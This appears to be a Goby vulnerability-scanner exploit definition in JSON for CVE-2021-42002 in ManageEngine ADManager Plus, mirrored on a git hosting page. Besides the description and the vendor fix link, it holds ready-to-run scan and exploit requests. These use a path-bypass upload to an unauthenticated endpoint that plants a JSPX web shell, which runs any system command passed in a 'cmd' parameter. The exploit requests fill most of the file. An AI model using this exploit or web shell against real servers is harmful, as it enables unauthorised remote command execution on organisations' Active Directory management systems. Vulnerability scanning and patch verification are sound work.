qwqdanchun
/
Goby
mirror of https://github.com/qwqdanchun/Goby.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
Goby/json/ManageEngine-ADManager-Plus...

222 lines
10 KiB
JSON
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

{
"Name": "ManageEngine ADManager Plus File upload vulnerability(CVE-2021-42002)",
"Description": "<p><span style=\"color: rgb(68, 68, 68);\"><span style=\"color: rgb(22, 51, 102); font-size: 16px;\">ManageEngine ADManager Plus is&nbsp;</span>An Active Directory (AD) management and reporting solution that allows IT administrators and technicians to manage AD objects easily and generate instant reports at the click of a button!<br></span></p><p><span style=\"color: rgb(68, 68, 68); font-size: medium;\">ManageEngine ADManager Plus &lt;7114 Filter bypass leading to file-upload remote code execution,this&nbsp;<span style=\"color: rgb(54, 71, 79);\">vulnerability has been fixed and released in version&nbsp;</span><strong style=\"color: rgb(54, 71, 79);\">7115</strong></span><br></p>",
"Product": "ManageEngine ADManager Plus",
"Homepage": "https://www.manageengine.com/",
"DisclosureDate": "2021-11-11",
"Author": "Flip_FI",
"FofaQuery": "app=\"ManageEngine-ADManager-Plus\" || title=\"ManageEngine - ADManager Plus\"",
"GobyQuery": "app=\"ManageEngine-ADManager-Plus\" || title=\"ManageEngine - ADManager Plus\"",
"Level": "3",
"Impact": "<p>The attacker can bypass the permission and directly upload the Trojan horse jspx file, and can remotely execute any system command to obtain the server permission, which is a great risk<br></p>",
"Recommendation": "<p><span style=\"color: var(--primaryFont-color);\">The vendor has released a bug fix, please pay attention to the update in time:<span style=\"color: rgb(22, 51, 102); font-size: 16px;\"><a href=\"https://www.manageengine.com/products/ad-manager/release-notes.html#7115\">https://www.manageengine.com/products/ad-manager/release-notes.html#7115</a></span></span><br></p>",
"References": [
"https://www.manageengine.com/products/ad-manager/release-notes.html#7115"
],
"Is0day": false,
"HasExp": true,
"ExpParams": [
{
"name": "cmd",
"type": "input",
"value": "whoami",
"show": ""
}
],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "POST",
"uri": "/;AAA/MobileAPI/WC/PasswordExpiryNotification?operation=fileAttachment",
"follow_redirect": false,
"header": {
"Content-Type": "multipart/form-data; boundary=---------------------------18496892720832008743187564073"
},
"data_type": "text",
"data": "-----------------------------18496892720832008743187564073\nContent-Disposition: form-data; name=\"UPLOADED_FILE\"; filename=\"1.jspx\"\r\nContent-Type: text/plain\r\n\r\n<jsp:root xmlns:jsp=\"http://java.sun.com/JSP/Page\" xmlns=\"http://www.w3.org/1999/xhtml\" xmlns:c=\"http://java.sun.com/jsp/jstl/core\" version=\"2.0\">\n<jsp:directive.page contentType=\"text/html;charset=UTF-8\" pageEncoding=\"UTF-8\"/>\n<jsp:directive.page import=\"java.util.*\"/>\n<jsp:directive.page import=\"java.io.*\"/>\n<jsp:scriptlet><![CDATA[\n\tout.println(\"c4ca4238a0b923820dcc509a6f75849b\");\n\t]]></jsp:scriptlet>\n</jsp:root>\r\n-----------------------------18496892720832008743187564073--"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "SUCCESS",
"bz": ""
}
]
},
"SetVariable": [
"file|lastbody|regex|([0-9_.a-z]+.jspx)"
]
},
{
"Request": {
"method": "GET",
"uri": "/ompemberapp/PasswordExpiryNotification/{{{file}}}",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "c4ca4238a0b923820dcc509a6f75849b",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "POST",
"uri": "/;AAA/MobileAPI/WC/PasswordExpiryNotification?operation=fileAttachment",
"follow_redirect": true,
"header": {
"Content-Type": "multipart/form-data; boundary=---------------------------18496892720832008743187564073"
},
"data_type": "text",
"data": "-----------------------------18496892720832008743187564073\nContent-Disposition: form-data; name=\"UPLOADED_FILE\"; filename=\"1.jspx\"\r\nContent-Type: text/plain\r\n\r\n<jsp:root xmlns:jsp=\"http://java.sun.com/JSP/Page\" xmlns=\"http://www.w3.org/1999/xhtml\" xmlns:c=\"http://java.sun.com/jsp/jstl/core\" version=\"2.0\">\n<jsp:directive.page contentType=\"text/html;charset=UTF-8\" pageEncoding=\"UTF-8\"/>\n<jsp:directive.page import=\"java.util.*\"/>\n<jsp:directive.page import=\"java.io.*\"/>\n<jsp:scriptlet><![CDATA[\n\tString cmd = pageContext.getRequest().getParameter(\"cmd\");\n\tif (cmd != null&&!\"\".equals(cmd)) {\n\ttry{\n\t\tProcess p = Runtime.getRuntime().exec(cmd);\n\t\tInputStream in = p.getInputStream();\n\t\tBufferedReader br = new BufferedReader(new InputStreamReader(in,\"GBK\"));\n\t\tString brs = br.readLine();\n\t\twhile(brs!=null){\n\t\t\tout.println(brs+\"</br>\");\n\t\t\tbrs = br.readLine();\n\t\t}\n\t\t}catch(Exception ex){\n\t\t\tout.println(ex.toString());\n\t\t}\n\t}]]></jsp:scriptlet>\n</jsp:root>\r\n-----------------------------18496892720832008743187564073--"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "SUCCESS",
"bz": ""
}
]
},
"SetVariable": [
"file|lastbody|regex|([0-9_.a-z]+.jspx)"
]
},
{
"Request": {
"method": "POST",
"uri": "/ompemberapp/PasswordExpiryNotification/{{{file}}}",
"follow_redirect": true,
"header": {
"Content-Type": "application/x-www-form-urlencoded"
},
"data_type": "text",
"data": "cmd={{{cmd}}}"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|regex|([\\w\\W]+)"
]
}
],
"Tags": [
"Code Execution",
"File Upload"
],
"VulType": [
"Code Execution",
"File Upload"
],
"CVEIDs": [
"CVE-2021-42002"
],
"CNNVD": [
"CNNVD-202111-1073"
],
"CNVD": [
"CNVD-2021-88234 "
],
"CVSSScore": "9.8",
"Translation": {
"CN": {
"Name": "ManageEngine ADManager Plus 任意文件上传漏洞(CVE-2021-42002)",
"Product": "ManageEngine ADManager Plus",
"Description": "<p><span style=\"color: rgb(22, 51, 102); font-size: 16px;\">ManageEngine ADManager Plus 是Zoho公司开发的</span>一个 Active Directory (AD) 管理和报告解决方案,它允许 IT 管理员和技术人员轻松管理 AD 对象并单击按钮生成即时报告!</p><p><span style=\"color: var(--primaryFont-color);\">ManageEngine ADManager Plus &lt;= 7114 存在权限绕过漏洞导致未授权用户允许上传JSPX文件至网站目录达到任意代码执行目的。</span></p>",
"Recommendation": "<p><span style=\"color: var(--primaryFont-color);\">厂商已发布了漏洞修复程序,请及时关注更新:<a href=\"https://www.manageengine.com/products/ad-manager/release-notes.html#7115\">https://www.manageengine.com/products/ad-manager/release-notes.html#7115</a></span><br></p>",
"Impact": "<p><span style=\"font-size: medium;\"><span style=\"color: rgb(22, 51, 102);\">攻击者通过权限绕过直接上传木马jspx文件可远程执行任意系统命令获取服务器权限风险极大</span></span></p>",
"VulType": [
"代码执⾏",
"⽂件上传"
],
"Tags": [
"代码执⾏",
"⽂件上传"
]
},
"EN": {
"Name": "ManageEngine ADManager Plus File upload vulnerability(CVE-2021-42002)",
"Product": "ManageEngine ADManager Plus",
"Description": "<p><span style=\"color: rgb(68, 68, 68);\"><span style=\"color: rgb(22, 51, 102); font-size: 16px;\">ManageEngine ADManager Plus is&nbsp;</span>An Active Directory (AD) management and reporting solution that allows IT administrators and technicians to manage AD objects easily and generate instant reports at the click of a button!<br></span></p><p><span style=\"color: rgb(68, 68, 68); font-size: medium;\">ManageEngine ADManager Plus &lt;7114 Filter bypass leading to file-upload remote code execution,this&nbsp;<span style=\"color: rgb(54, 71, 79);\">vulnerability has been fixed and released in version&nbsp;</span><strong style=\"color: rgb(54, 71, 79);\">7115</strong></span><br></p>",
"Recommendation": "<p><span style=\"color: var(--primaryFont-color);\">The vendor has released a bug fix, please pay attention to the update in time:<span style=\"color: rgb(22, 51, 102); font-size: 16px;\"><a href=\"https://www.manageengine.com/products/ad-manager/release-notes.html#7115\">https://www.manageengine.com/products/ad-manager/release-notes.html#7115</a></span></span><br></p>",
"Impact": "<p>The attacker can bypass the permission and directly upload the Trojan horse jspx file, and can remotely execute any system command to obtain the server permission, which is a great risk<br></p>",
"VulType": [
"Code Execution",
"File Upload"
],
"Tags": [
"Code Execution",
"File Upload"
]
}
},
"AttackSurfaces": {
"Application": null,
"Support": null,
"Service": null,
"System": null,
"Hardware": null
}
}
Reference in New Issue View Git Blame Copy Permalink